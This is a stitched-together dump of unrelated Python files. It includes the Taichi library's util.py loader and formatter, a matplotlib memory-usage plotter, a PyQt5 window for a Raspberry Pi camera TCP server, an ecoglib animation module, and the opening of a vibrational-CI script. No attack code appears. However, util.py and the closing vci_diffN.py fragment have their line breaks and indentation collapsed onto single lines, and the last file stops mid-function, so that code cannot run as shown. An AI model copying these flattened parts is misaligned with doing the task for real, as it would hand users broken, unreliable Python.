util.py
import os import re import shutil import sys import ctypes from pathlib import Path from colorama import Fore, Back, Style from taichi.misc.settings import get_output_directory, get_build_directory, get_bin_directory, get_repo_directory, get_runtime_directory from taichi.misc.util import get_os_name, get_unique_task_id if sys.version_info[0] < 3 or sys.version_info[1] <= 5: print("\nPlease restart with Python 3.6+\n") print("Current Python version:", sys.version_info) exit(-1) ti_core = None def in_docker(): if os.environ.get("TI_IN_DOCKER", "") == "": return False else: return True def import_ti_core(tmp_dir=None): global ti_core if get_os_name() != 'win': old_flags = sys.getdlopenflags() sys.setdlopenflags(258) # 258 = RTLD_NOW | RTLD_GLOBAL else: pyddir = os.path.join(package_root(), 'lib') os.environ['PATH'] += ';' + pyddir try: import taichi_core as core except Exception as e: if isinstance(e, ImportError): print( "Share object taichi_core import failed. If you are on Windows, please consider installing \"Microsoft Visual C++ Redistributable\" (https://aka.ms/vs/16/release/vc_redist.x64.exe)" ) raise e ti_core = core if get_os_name() != 'win': sys.setdlopenflags(old_flags) lib_dir = os.path.join(package_root(), 'lib') core.set_lib_dir(locale_encode(lib_dir)) if tmp_dir is not None: core.set_tmp_dir(locale_encode(tmp_dir)) def locale_encode(s): try: import locale encoding = locale.getdefaultlocale()[1] except: encoding = 'utf8' return s.encode(encoding) def is_ci(): return os.environ.get('TI_CI', '') == '1' def package_root(): return os.path.join(os.path.dirname(os.path.realpath(__file__)), '../') def is_release(): return os.environ.get('TAICHI_REPO_DIR', '') == '' def get_core_shared_object(): if is_release(): directory = os.path.join(package_root(), 'lib') else: directory = get_bin_directory() return os.path.join(directory, 'libtaichi_core.so') def get_repo(): from git import Repo repo = Repo(get_repo_directory()) return repo def print_red_bold(*args, 
**kwargs): print(Fore.RED + Style.BRIGHT, end='') print(*args, **kwargs) print(Style.RESET_ALL, end='') def has_suffix(f, suffixes): for suf in suffixes: if f.endswith('.' + suf): return True return False def format_plain_text(fn): formatted = '' with open(fn, 'r') as f: for l in f: l = l.rstrip() if l.find('\t') != -1: print(f'Warning: found tab in {fn}. Skipping...') return formatted += l + '\n' while len(formatted) and formatted[-1] == '\n': formatted = formatted[:-1] formatted += '\n' with open(fn, 'w') as f: f.write(formatted) def _find_clang_format_bin(): candidates = ['clang-format-6.0', 'clang-format'] result = None import subprocess as sp for c in candidates: try: if sp.run([c, '--version'], stdout=sp.DEVNULL, stderr=sp.DEVNULL).returncode == 0: result = c break except: pass import colorama colorama.init() if result is None: print(Fore.YELLOW + 'Did not find any clang-format executable, skipping C++ files', file=sys.stderr) else: print('C++ formatter: {}{}'.format(Fore.GREEN, result)) print(Style.RESET_ALL) return result def format(all=False, diff=None): import os import taichi as tc from yapf.yapflib.yapf_api import FormatFile repo = get_repo() if all: directories = [ 'taichi', 'tests', 'examples', 'misc', 'python', 'benchmarks', 'docs', 'misc' ] files = [] for d in directories: files += list( Path(os.path.join(tc.get_repo_directory(), d)).rglob('*')) else: if diff is None: def find_diff_or_empty(s): try: return repo.index.diff(s) except: return [] # TODO(#628): Have a way to customize the repo names, in order to # support noncanonical namings. # # Finds all modified files from upstream/master to working tree # 1. diffs between the index and upstream/master. Also inclulde # origin/master for repo owners. files = find_diff_or_empty('upstream/master') files += find_diff_or_empty('origin/master') # 2. 
diffs between the index and the working tree # https://gitpython.readthedocs.io/en/stable/tutorial.html#obtaining-diff-information files += repo.index.diff(None) else: files = repo.index.diff(diff) files = list( map(lambda x: os.path.join(tc.get_repo_directory(), x.a_path), files)) files = sorted(set(map(str, files))) clang_format_bin = _find_clang_format_bin() print('Code formatting ...') for fn in files: if not os.path.exists(fn): continue if os.path.isdir(fn): continue if fn.find('.pytest_cache') != -1: continue if fn.find('docs/build/') != -1: continue if re.match(r'.*examples\/[a-z_]+\d\d+\.py$', fn): print(f'Skipping example file {fn}...') continue if fn.endswith('.py'): print('Formatting "{}"'.format(fn)) FormatFile(fn, in_place=True, style_config=os.path.join(tc.get_repo_directory(), 'misc', '.style.yapf')) elif clang_format_bin and has_suffix(fn, ['cpp', 'h', 'cu', 'cuh']): print('Formatting "{}"'.format(fn)) os.system('{} -i -style=file {}'.format(clang_format_bin, fn)) elif has_suffix(fn, ['txt', 'md', 'rst', 'cfg', 'll', 'ptx']): print('Formatting "{}"'.format(fn)) format_plain_text(fn) elif has_suffix(fn, [ 'pyc', 'png', 'jpg', 'bmp', 'gif', 'gitignore', 'whl', 'mp4', 'html' ]): pass else: print(f'Skipping {fn}...') print('Formatting done!') create_sand_box_on_windows = True def build(): tmp_cwd = os.getcwd() bin_dir = get_build_directory() try: os.mkdir(bin_dir) except: pass os.chdir(bin_dir) import multiprocessing print('Building taichi...') num_make_threads = min(20, multiprocessing.cpu_count()) if get_os_name() == 'win': make_ret = os.system( "msbuild /p:Configuration=Release /p:Platform=x64 /m taichi.sln") else: make_ret = os.system('make -j {}'.format(num_make_threads)) if make_ret != 0: print(' Error: Build failed.') exit(-1) os.chdir(tmp_cwd) def prepare_sandbox(src): global g_tmp_dir assert os.path.exists(src) import atexit import shutil from tempfile import mkdtemp tmp_dir = mkdtemp(prefix='taichi-') atexit.register(shutil.rmtree, tmp_dir) 
print(f'[Taichi] preparing sandbox at {tmp_dir}') dest = os.path.join(tmp_dir, 'taichi_core.so') shutil.copy(src, dest) os.mkdir(os.path.join(tmp_dir, 'runtime/')) print(f'[Taichi] sandbox prepared') return tmp_dir if is_release(): print("[Taichi] mode=release") sys.path.append(os.path.join(package_root(), 'lib')) if get_os_name() != 'win': link_src = os.path.join(package_root(), 'lib', 'taichi_core.so') link_dst = os.path.join(package_root(), 'lib', 'libtaichi_core.so') # For llvm jit to find the runtime symbols if not os.path.exists(link_dst): os.symlink(link_src, link_dst) import_ti_core() if get_os_name() != 'win': dll = ctypes.CDLL(get_core_shared_object(), mode=ctypes.RTLD_GLOBAL) ti_core.set_python_package_dir(package_root()) os.makedirs(ti_core.get_repo_dir(), exist_ok=True) else: print("[Taichi] mode=development") if get_os_name() == 'osx': bin_dir = get_bin_directory() os.environ['DYLD_FALLBACK_LIBRARY_PATH'] = get_runtime_directory() lib_path = os.path.join(bin_dir, 'libtaichi_core.dylib') tmp_cwd = os.getcwd() tmp_dir = prepare_sandbox(lib_path) os.chdir(tmp_dir) sys.path.append(tmp_dir) import taichi_core as ti_core os.chdir(tmp_cwd) elif get_os_name() == 'linux': bin_dir = get_bin_directory() if 'LD_LIBRARY_PATH' in os.environ: os.environ['LD_LIBRARY_PATH'] += ':/usr/lib64/' else: os.environ['LD_LIBRARY_PATH'] = '/usr/lib64/' lib_path = os.path.join(bin_dir, 'libtaichi_core.so') assert os.path.exists(lib_path) tmp_cwd = os.getcwd() tmp_dir = prepare_sandbox(lib_path) os.chdir(tmp_dir) sys.path.append(tmp_dir) try: import_ti_core(tmp_dir) except Exception as e: from colorama import Fore, Back, Style print_red_bold("Taichi core import failed: ", end='') print(e) exit(-1) os.chdir(tmp_cwd) elif get_os_name() == 'win': bin_dir = get_bin_directory() dll_path1 = os.path.join(bin_dir, 'RelWithDebInfo', 'taichi_core.dll') dll_path2 = os.path.join(bin_dir, 'libtaichi_core.dll') assert os.path.exists(dll_path1) and not os.path.exists(dll_path2) # On windows 
when an dll/pyd is loaded, we can not write to it any more old_wd = os.getcwd() os.chdir(bin_dir) if create_sand_box_on_windows: # Create a sandbox for separated core lib development and loading folder = os.path.join(get_output_directory(), 'tmp', get_unique_task_id()) lib_dir = os.path.join(get_repo_directory(), 'external', 'lib') os.environ['PATH'] += ';' + lib_dir os.makedirs(folder) if os.path.exists(dll_path1): shutil.copy(dll_path1, os.path.join(folder, 'taichi_core.pyd')) else: shutil.copy(dll_path2, os.path.join(folder, 'taichi_core.pyd')) os.environ['PATH'] += ';' + folder sys.path.append(folder) else: shutil.copy(dll_path, os.path.join(bin_dir, 'taichi_core.pyd')) sys.path.append(bin_dir) try: import taichi_core as ti_core except Exception as e: print(e) print() print( 'Hint: please make sure the major and minor versions of the Python executable is correct.' ) print() raise e os.chdir(old_wd) log_level = os.environ.get('TI_LOG_LEVEL', '') if log_level: ti_core.set_logging_level(log_level) def get_dll_name(name): if get_os_name() == 'linux': return 'libtaichi_%s.so' % name elif get_os_name() == 'osx': return 'libtaichi_%s.dylib' % name elif get_os_name() == 'win': return 'taichi_%s.dll' % name else: assert False, "Unknown OS" def load_module(name, verbose=True): if verbose: print('Loading module', name) try: if get_os_name() == 'osx': mode = ctypes.RTLD_LOCAL else: mode = ctypes.RTLD_GLOBAL if '.so' in name: ctypes.PyDLL(name, mode=mode) else: ctypes.PyDLL(os.path.join(get_repo_directory(), 'build', get_dll_name(name)), mode=mode) except Exception as e: print(Fore.YELLOW + "Warning: module [{}] loading failed: {}".format(name, e) + Style.RESET_ALL) def at_startup(): if not is_release(): output_dir = get_output_directory() if not os.path.exists(output_dir): print('Making output directory') os.mkdir(output_dir) ti_core.set_core_state_python_imported(True) def start_memory_monitoring(output_fn, pid=-1, interval=1): # removing dependency on psutil return 
import os, psutil, time if pid == -1: pid = os.getpid() import multiprocessing def task(): with open(output_fn, 'w') as f: process = psutil.Process(pid) while True: try: mem = process.memory_info().rss except: mem = -1 time.sleep(interval) print(time.time(), mem, file=f) f.flush() proc = multiprocessing.Process(target=task, daemon=True) proc.start() def require_version(major, minor=None, patch=None): versions = [ int(ti_core.get_version_major()), int(ti_core.get_version_minor()), int(ti_core.get_version_patch()), ] match = major == versions[0] and ( minor < versions[1] or minor == versions[1] and patch <= versions[2]) if match: return else: print("Taichi version mismatch. required >= {}.{}.{}".format( major, minor, patch)) print("Installed =", ti_core.get_version_string()) raise Exception("Taichi version mismatch") at_startup() def _print_taichi_header(): dev_mode = not is_release() header = '[Taichi] ' if dev_mode: header += '<dev mode>, ' else: header += f'version {ti_core.get_version_string()}, ' supported_archs = ['cpu'] if ti_core.with_cuda(): supported_archs.append('cuda') if ti_core.with_opengl(): supported_archs.append('opengl') if ti_core.with_metal(): supported_archs.append('metal') if len(supported_archs) == 1: supported_archs[0] = 'cpu only' archs_str = ', '.join(sorted(supported_archs)) header += f'supported archs: [{archs_str}], ' commit_hash = ti_core.get_commit_hash() commit_hash = commit_hash[:8] header += f'commit {commit_hash}, ' py_ver = '.'.join(str(x) for x in sys.version_info[:3]) header += f'python {py_ver}' print(header) _print_taichi_header()
# ======================= plotter.py =======================
#%%
import matplotlib.animation as animation
import matplotlib.pyplot as plt
import psutil

from multiprocessing import Event, \
                            Process, \
                            SimpleQueue as SQ, \
                            set_start_method
from threading import Thread
from time import sleep
from types import SimpleNamespace as SN

# 'spawn' keeps the plotting child process free of inherited state.
set_start_method('spawn', force=True)


class QueuePair(object):
    """A named pair of queues feeding one line of the live plot.

    ``graph`` carries data samples, ``event`` carries annotation messages
    that get pinned to the most recent data point.
    """
    def __init__(self, name, history, padding=0):
        self.graph = SQ()    # data samples (one per animation tick)
        self.event = SQ()    # annotation messages
        self.name = name
        self.history = history   # max points kept for display
        # Rolling y-series for the data line and the event markers;
        # `padding` pre-fills with Nones so the trace starts at the right x.
        self.y = SN(graph=[None]*padding, event=[None]*padding)
        self.anno = []       # [x, y, text] annotation triples

    def _get_graph(self):
        # Pop at most one sample per tick; None means "no data this tick".
        val = None
        if not self.graph.empty():
            val = self.graph.get()
        self.y.graph.append(val)
        self.y.graph = self.y.graph[-self.history:]

    def _get_event(self, t):
        val = None
        # If a message was received this tick...
        if not self.event.empty():
            val = self.event.get()
            # ...attach it to the last known data point (search backwards).
            for i in range(1, len(self.y.graph)):
                if self.y.graph[-i] is not None:
                    self.anno.append([t, self.y.graph[-i], str(val)])
                    val = self.y.graph[-i]
                    break
            else:
                # for-else: no non-None value found in the whole history.
                print(f'Could not attach annotation {val} to a value on the graph, dropping annotation')
                val = None
        self.y.event.append(val)
        self.y.event = self.y.event[-self.history:]

    def get(self, t):
        """Advance both series by one animation tick at time ``t``."""
        self._get_graph()
        self._get_event(t)
        return


class Plotter(object):
    """Live plotter running matplotlib animation in a child process.

    Data producers push values into per-name QueuePairs (see get_queues);
    the child process animates them at ``refresh``-second intervals.
    """
    def __init__(self, refresh=1, history=60, style='fivethirtyeight', save_to=None):
        self.queues = {}
        self.refresh = refresh                 # seconds per animation tick
        self.history = int(history / refresh)  # ticks kept on screen
        self.time = 0
        self.x = []
        #self.wait = Event()
        self.save_wait = Event()   # handshake used when saving to a file
        self.save_wait.clear()
        self.save_to = save_to
        # Instantiate the plot
        self.style = style
        self.fig = plt.figure()
        plt.ion()

    def get_queues(self, name):
        """Return (creating on first use) the QueuePair for ``name``."""
        if name in self.queues:
            return self.queues[name]
        self.queues[name] = QueuePair(name=name, history=self.history)
        return self.queues[name]

    def start(self):
        """Launch the animation child process; keep a psutil handle to it."""
        #self.wait.set()
        #self.proc = Process(target=self.__run__)
        #self.proc.start()
        proc = Process(target=self._run)
        proc.start()
        # psutil handle enables suspend()/resume() from the parent.
        self.proc = psutil.Process(proc.pid)
        return True

    def stop(self):
        """Signal save (if configured), then terminate the child process."""
        self.save_wait.set()
        sleep(.1)
        self.save_wait.wait()
        self.proc.terminate()
        return True

    def _run(self):
        # Runs in the child process.
        # TODO: look into blit support
        self.anim = animation.FuncAnimation(self.fig,
                                            self.animation,
                                            interval=self.refresh*1000,
                                            cache_frame_data=False)
        plt.style.use(self.style)
        if self.save_to:
            # Wait for stop() to fire, then write the movie and ack back.
            self.save_wait.wait()
            self.save_wait.clear()
            self.anim.save(self.save_to)
            self.save_wait.set()
        else:
            plt.show()
        '''
        while True:
            if not self.wait.is_set():
                print('PAUSING')
                self.anim.event_source.stop()
                self.wait.wait()
                print('RESUMING')
                self.anim.event_source.start()
            sleep(self.refresh)
        '''

    def pause(self):
        # Suspends the child process via psutil.
        self.proc.suspend()
        #self.wait.clear()
        # NOTE(review): self.anim is created in the child process (_run);
        # in the parent this attribute likely does not exist — confirm.
        return self.anim.event_source.stop()

    def resume(self):
        self.proc.resume()
        #self.wait.set()
        # NOTE(review): same caveat as pause() regarding self.anim.
        return self.anim.event_source.start()

    def animation(self, i):
        """FuncAnimation callback: advance time, drain queues, redraw."""
        self.time += self.refresh
        self.x.append(self.time)
        self.x = self.x[-self.history:]
        plt.clf()
        for name, pair in self.queues.items():
            pair.get(self.time)
            plt.plot(self.x, pair.y.graph, label=pair.name)
            plt.plot(self.x, pair.y.event, 'o')
            for anno in pair.anno:
                x, y, note = anno
                plt.annotate(note, xy=(x, y))
        plt.title('Memory Usage over Time')
        plt.ylabel('GB')
        plt.xlabel(f'Time ({self.refresh}s)')
        plt.gca().spines['top'].set_visible(False)
        plt.gca().spines['right'].set_visible(False)
        plt.legend(loc='upper left')


"""# NOT IMPLEMENTED
def dec_watch(func, name=None, enable=[], pArgs={}, wArgs={}, queues=[]):
    '''
    queues = ['name', 'name', ...]
    return queues for those names into the target func
    '''
    def wrap(*args, **kwargs):
        return func(*args, **kwargs, pltt=ret)
    pltt = Plotter(**pArgs)
    ret = {'pltt': pltt}
    ret[name or func.__name__] = {'pid': psutil.os.getpid(),
                                  'queues': pltt.get_queues(name or func.__name__)}
    for resv in enable:
        if resv in ['total']:
            watch[resv] = {resv: {}, pltt.get_queues(resv)}
    watcher(watch=ret, **wArgs)
    return wrap
"""


def watcher(*args, **kwargs):
    """Run _watch in a daemon thread so monitoring never blocks the caller."""
    th = Thread(target=_watch, args=args, kwargs=kwargs, daemon=True)
    th.daemon = True
    th.start()


def _watch(watch, refresh=1, measure=1e9, limit=10, **kwargs):
    '''
    Procs is a dict in the format:
    {name: {pid: ..., queue: ...}, ...}

    Polls RSS of each watched pid every ``refresh`` seconds (divided by
    ``measure``, default GB) and pushes readings into the per-name queues.
    Exits once no watched process is alive.
    '''
    print('Initializing watcher')
    resvd = ['total']
    # Separate reserved pseudo-entries ('total') from real processes.
    procs = [SN(name=name, **attrs) for name, attrs in watch.items() if name not in resvd]
    resvs = [SN(name=name, **attrs) for name, attrs in watch.items() if name in resvd]
    # Initialize the psutil process objects and expected variables
    for proc in procs:
        proc.ps = psutil.Process(proc.pid)
        proc.mem = 0
        proc.max = 0
    for resv in resvs:
        resv.mem = 0
        resv.max = 0
    try:
        alive = True
        while alive:
            alive = False
            for proc in procs:
                if not proc.ps.is_running() or proc.ps.status() == psutil.STATUS_ZOMBIE:
                    proc.mem = 0
                    continue
                alive = True
                proc.mem = proc.ps.memory_info().rss / measure
                proc.max = max(proc.max, proc.mem)
                proc.queue.put(proc.mem)
            for resv in resvs:
                if resv.name == 'total':
                    # 'total' aggregates across all watched processes.
                    resv.mem = sum([proc.mem for proc in procs])
                    resv.max = max(resv.max, resv.mem)
                    resv.queue.put(resv.mem)
            sleep(refresh)
    except:
        # Best-effort monitor: swallow errors (e.g. process vanished mid-poll).
        pass
    print('Closing watcher')


def __watch(watch, refresh=1, measure=1e9, limit=10, timeout=30):
    # Alternative watcher: exits after ``timeout`` polls with no memory change
    # instead of when the processes die.
    print('Initializing watcher')
    resvd = ['total']
    # Separate reserved processes from nonreserved
    procs = [SN(name=name, **attrs) for name, attrs in watch.items() if name not in resvd]
    resvs = [SN(name=name, **attrs) for name, attrs in watch.items() if name in resvd]
    # Initialize the psutil process objects and expected variables
    for proc in procs:
        proc.ps = psutil.Process(proc.pid)
        proc.mem = 0
        proc.max = 0
    for resv in resvs:
        resv.mem = 0
        resv.max = 0
    health = timeout
    change = False
    while health:
        for proc in procs:
            if not proc.ps.is_running() or proc.ps.status() == psutil.STATUS_ZOMBIE:
                proc.mem = 0
                continue
            proc.prv = proc.mem
            proc.mem = proc.ps.memory_info().rss / measure
            proc.max = max(proc.max, proc.mem)
            proc.queue.put(proc.mem)
            # If the previous memory is different than the current
            if proc.prv != proc.mem:
                change = True
        for resv in resvs:
            if resv.name == 'total':
                resv.mem = sum([proc.mem for proc in procs])
                resv.max = max(resv.max, resv.mem)
                resv.queue.put(resv.mem)
        sleep(refresh)
        # If change did occur, reset health, else decrement
        if change:
            change = False
            health = timeout
        else:
            health -= 1
# ======================= main.py =======================
import io
import os
import socket
import struct
import time
import picamera
import sys,getopt
from Thread import *
from threading import Thread
from server import Server
from server_ui import Ui_server_ui
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from PyQt5.QtGui import *


class mywindow(QMainWindow,Ui_server_ui):
    """Frameless, draggable Qt control window for the TCP camera server.

    Can also run headless (``-n``) and optionally auto-start the TCP
    server (``-t``). Three worker threads run the server: video sender,
    command reader and power monitor.
    """
    def __init__(self):
        self.user_ui=True        # False when started with -n (no GUI)
        self.start_tcp=False     # True when started with -t (auto-start server)
        self.TCP_Server=Server()
        self.parseOpt()
        if self.user_ui:
            self.app = QApplication(sys.argv)
            super(mywindow,self).__init__()
            self.setupUi(self)
            self.m_DragPosition=self.pos()
            # Borderless always-on-top window; dragging handled manually below.
            self.setWindowFlags(Qt.FramelessWindowHint | Qt.WindowStaysOnTopHint)
            self.setMouseTracking(True)
            self.Button_Server.setText("On")
            # Toggle once so the server starts and the label/button sync up.
            self.on_pushButton()
            self.Button_Server.clicked.connect(self.on_pushButton)
            self.pushButton_Close.clicked.connect(self.close)
            self.pushButton_Min.clicked.connect(self.windowMinimumed)
        if self.start_tcp:
            self.TCP_Server.StartTcpServer()
            self.ReadData=Thread(target=self.TCP_Server.readdata)
            self.SendVideo=Thread(target=self.TCP_Server.sendvideo)
            self.power=Thread(target=self.TCP_Server.Power)
            self.SendVideo.start()
            self.ReadData.start()
            self.power.start()
            if self.user_ui:
                self.label.setText("Server On")
                self.Button_Server.setText("Off")

    def windowMinimumed(self):
        # Minimize handler for the custom title-bar button.
        self.showMinimized()

    def mousePressEvent(self, event):
        # Record the drag anchor for the frameless window.
        if event.button()==Qt.LeftButton:
            self.m_drag=True
            self.m_DragPosition=event.globalPos()-self.pos()
            event.accept()

    def mouseMoveEvent(self, QMouseEvent):
        # NOTE(review): `buttons() and Qt.LeftButton` is always truthy while
        # any button is held; a bitwise test (`buttons() & Qt.LeftButton`)
        # was probably intended — confirm before changing.
        if QMouseEvent.buttons() and Qt.LeftButton:
            self.move(QMouseEvent.globalPos()-self.m_DragPosition)
            QMouseEvent.accept()

    def mouseReleaseEvent(self, QMouseEvent):
        self.m_drag=False

    def parseOpt(self):
        # -t: start the TCP server immediately; -n: run without a GUI.
        self.opts,self.args = getopt.getopt(sys.argv[1:],"tn")
        for o,a in self.opts:
            if o in ('-t'):
                print ("Open TCP")
                self.start_tcp=True
            elif o in ('-n'):
                self.user_ui=False

    def close(self):
        """Stop worker threads, shut sockets down and exit the process."""
        try:
            stop_thread(self.SendVideo)
            stop_thread(self.ReadData)
            stop_thread(self.power)
        except:
            # Threads may never have been started.
            pass
        try:
            self.TCP_Server.server_socket.shutdown(2)
            self.TCP_Server.server_socket1.shutdown(2)
            self.TCP_Server.StopTcpServer()
        except:
            # Sockets may already be closed.
            pass
        print ("Close TCP")
        if self.user_ui:
            QCoreApplication.instance().quit()
        # Hard-exit so daemon/worker threads cannot keep the process alive.
        os._exit(0)

    def on_pushButton(self):
        """Toggle the TCP server on/off based on the current label state."""
        if self.label.text()=="Server Off":
            self.label.setText("Server On")
            self.Button_Server.setText("Off")
            self.TCP_Server.tcp_Flag = True
            print ("Open TCP")
            self.TCP_Server.StartTcpServer()
            self.SendVideo=Thread(target=self.TCP_Server.sendvideo)
            self.ReadData=Thread(target=self.TCP_Server.readdata)
            self.power=Thread(target=self.TCP_Server.Power)
            self.SendVideo.start()
            self.ReadData.start()
            self.power.start()
        elif self.label.text()=='Server On':
            self.label.setText("Server Off")
            self.Button_Server.setText("On")
            self.TCP_Server.tcp_Flag = False
            try:
                stop_thread(self.ReadData)
                stop_thread(self.power)
                stop_thread(self.SendVideo)
            except:
                pass
            self.TCP_Server.StopTcpServer()
            print ("Close TCP")


if __name__ == '__main__':
    myshow=mywindow()
    if myshow.user_ui==True:
        myshow.show();
        sys.exit(myshow.app.exec_())
    else:
        # Headless mode: nothing to do in the main thread; workers run
        # until interrupted.
        # NOTE(review): the try body is `pass`, so KeyboardInterrupt can
        # never be caught here — a blocking loop was probably intended.
        try:
            pass
        except KeyboardInterrupt:
            myshow.close()
# ======================= animation.py =======================
import os
import time
from multiprocessing import Process

import numpy as np
from pyqtgraph.Qt import QtCore
from traits.api import Button, Enum, Bool, Int, File
from traitsui.api import View, VGroup, HGroup, UItem, \
     Item, FileEditor, RangeEditor
from pyface.timer.api import Timer

import ecoglib.vis.ani as ani

from .base import VisModule, colormaps
from ..helpers import Error, validate_file_path
from .. import pyf_new_api


__all__ = ['AnimateInterval']


class AnimateInterval(VisModule):
    """Animate the currently selected data interval frame-by-frame,
    optionally writing it out as an MP4 via ffmpeg.

    Timer-driven playback adapts a frame-skip factor so animation keeps
    up with the requested (scaled) real-time rate. ``pyf_new_api``
    selects between old/new pyface Timer APIs throughout.
    """
    name = 'Animate window'
    anim_frame = Button('Animate')
    # Playback slow-down factor (divide real time by this).
    anim_time_scale = Enum(50, [0.1, 0.5, 1, 5, 10, 20, 50, 100, 200, 500])
    _has_ffmpeg = Bool(False)
    write_frames = Button('Write movie')
    drop_video_frames = Int(1)   # keep every k-th frame when writing video
    video_file = File(
        os.path.join(os.path.abspath(os.curdir), 'vid.mp4')
    )
    cmap = Enum('gray', colormaps)
    clim = Enum('display', ('display', '[2-98]%', '[1-99]%', 'full'))

    def __init__(self, **traits):
        # Detect ffmpeg availability up front; gates the video-writing UI.
        import matplotlib.animation as anim
        traits['_has_ffmpeg'] = 'ffmpeg' in anim.writers.list()
        super(AnimateInterval, self).__init__(**traits)

    def __step_frame(self):
        # Timer callback: draw frame __n, then adapt __f_skip so playback
        # tracks the requested rate. (Attributes are name-mangled.)
        n = self.__n
        x = self.__x
        y = self.__y
        if n >= self.__n_frames:
            # Past the end of the interval: stop playback.
            if pyf_new_api:
                self._atimer.stop()
            else:
                self._atimer.Stop()
            return
        t0 = time.time()
        scaled_dt = self.anim_time_scale * (x[1] - x[0])
        try:
            self.parent._qtwindow.set_image_frame(x=x[n], frame_vec=y[:, n])
        except IndexError:
            if pyf_new_api:
                self._atimer.stop()
            else:
                self._atimer.Stop()
        QtCore.QCoreApplication.instance().processEvents()
        # calculate the difference between the desired interval
        # and the time it just took to draw (per "frame")
        elapsed = time.time() - t0
        t_pause = scaled_dt - elapsed / self.__f_skip
        if t_pause < 0:
            # Rendering is too slow: skip more frames per tick.
            self.__f_skip += 1
        else:
            # timer is in the middle of API change
            if pyf_new_api:
                self._atimer.interval = t_pause
            else:
                self._atimer.setInterval(t_pause * 1000.0)
            # check to see if the frame skip can be decreased (e.g.
            # real-time is slowed down)
            while elapsed / max(1, self.__f_skip - 1) < scaled_dt:
                self.__f_skip = max(1, self.__f_skip - 1)
                if self.__f_skip == 1:
                    break
        self.__n += self.__f_skip

    def _anim_frame_fired(self):
        # 'Animate' button: toggles playback. A second press while running
        # stops the timer.
        if hasattr(self, '_atimer'):
            if pyf_new_api and self._atimer.active:
                self._atimer.stop()
                return
            elif not pyf_new_api and self._atimer.IsRunning():
                self._atimer.Stop()
                return

        x, self.__y = self.curve_manager.interactive_curve.current_data(full_xdata=False)
        self.__f_skip = 1
        self.__x = x
        dt = self.__x[1] - self.__x[0]
        self.__n_frames = self.__y.shape[1]
        self.__n = 0
        self._atimer = Timer(self.anim_time_scale * dt * 1000,
                             self.__step_frame)

    def _get_clim(self, array):
        # Resolve the clim trait into concrete (lo, hi) color limits.
        if self.clim == 'full':
            return (array.min(), array.max())
        if self.clim.endswith('%'):
            # Parse percentile bounds out of e.g. '[2-98]%'.
            clim = self.clim.replace('[', '').replace(']', '').replace('%', '')
            p_lo, p_hi = map(float, clim.split('-'))
            print(p_lo, p_hi)
            return np.percentile(array.ravel(), [p_lo, p_hi])
        else:
            # 'display': reuse the colorbar range of the main window
            # (scaled to uV — presumably the axis is in V; confirm).
            clim = self.parent._qtwindow.cb.axis.range
            return clim[0] * 1e6, clim[1] * 1e6

    def _write_frames_fired(self):
        # 'Write movie' button: render the current interval to video in a
        # separate process so the UI stays responsive.
        if not validate_file_path(self.video_file):
            ev = Error(
                error_msg='Invalid video file:\n{0}'.format(self.video_file)
            )
            ev.edit_traits()
            return
        x, y = self.curve_manager.interactive_curve.current_data(full_xdata=False)
        y *= 1e6   # convert to uV for display
        dt = x[1] - x[0]
        # fps is sampling frequency divided by time scale dilation
        fps = (dt * self.anim_time_scale) ** -1.0
        chan_map = self.chan_map
        if self.drop_video_frames > 1:
            x = x[::self.drop_video_frames]
            y = y[..., ::self.drop_video_frames]
            fps /= float(self.drop_video_frames)
        frames = chan_map.embed(y.T, axis=1)
        clim = self._get_clim(y)
        args = (frames, self.video_file)
        kwargs = dict(timer='s', time=x, fps=fps,
                      title='Scroller video', quicktime=True,
                      colorbar=True, cbar_label='uV',
                      cmap=self.cmap, clim=clim,
                      origin='upper', qtdpi=100)
        proc = Process(target=ani.write_frames, args=args, kwargs=kwargs)
        proc.start()

    def default_traits_view(self):
        # Two-panel layout; the video-writing panel shows only with ffmpeg.
        v = View(
            HGroup(
                VGroup(
                    Item('anim_time_scale', label='Divide real time'),
                    Item('anim_frame'),
                    label='Animate Frames'
                ),
                HGroup(
                    VGroup(
                        Item('video_file', label='MP4 File',
                             editor=FileEditor(dialog_style='save')),
                        UItem('write_frames')
                    ),
                    VGroup(
                        Item('cmap', label='Colormap'),
                        Item('clim', label='Color limit mode'),
                        Item('drop_video_frames',
                             label='Frame drop rate',
                             editor=RangeEditor(low=1, high=100, mode='spinner')),
                    ),
                    visible_when='_has_ffmpeg'
                )
            )
        )
        return v
# ======================= vci_diffN.py =======================
import numpy as np import math import itertools from collections import Counter import sys from numpy import linalg from numba import jit import time from multiprocessing import Process, Queue import csv from itertools import permutations #This function is obtained from pyvci plz see github resource code #this function is for get the combination of all excited states #I used max number of excited level for each mode #eg: nmode = 3, maxlvl = 8(0-7) then we have 8*8*8 combines since 0 the vacuum one counts. #if you want to get the sum max number of states like Dr.Yagi's code plz modify this fn. #XXX add lambda verification #XXX add different N (maxn) #sys.stdout = open("vci_test_output.txt","w") #function to generate the combination t0 = time.time() class VCIthermo: def __init__(self,Lambd,Temprt,maxn,calVCI):#calVCI= 1 or filename Vref= 0 maxorder = 5 nmode = 3 filepath = "../data/prop_no_3.hs" w_omega,FCQ3,FCQ4 = self.readSindoPES(filepath,nmode) linrComb = self.loopfn(nmode,maxn) print(len(linrComb)) print(linrComb) Evlst = self.EvaluationList(nmode,w_omega,maxn,maxorder)# The list of the evaluation from Hermes xvscf table. 
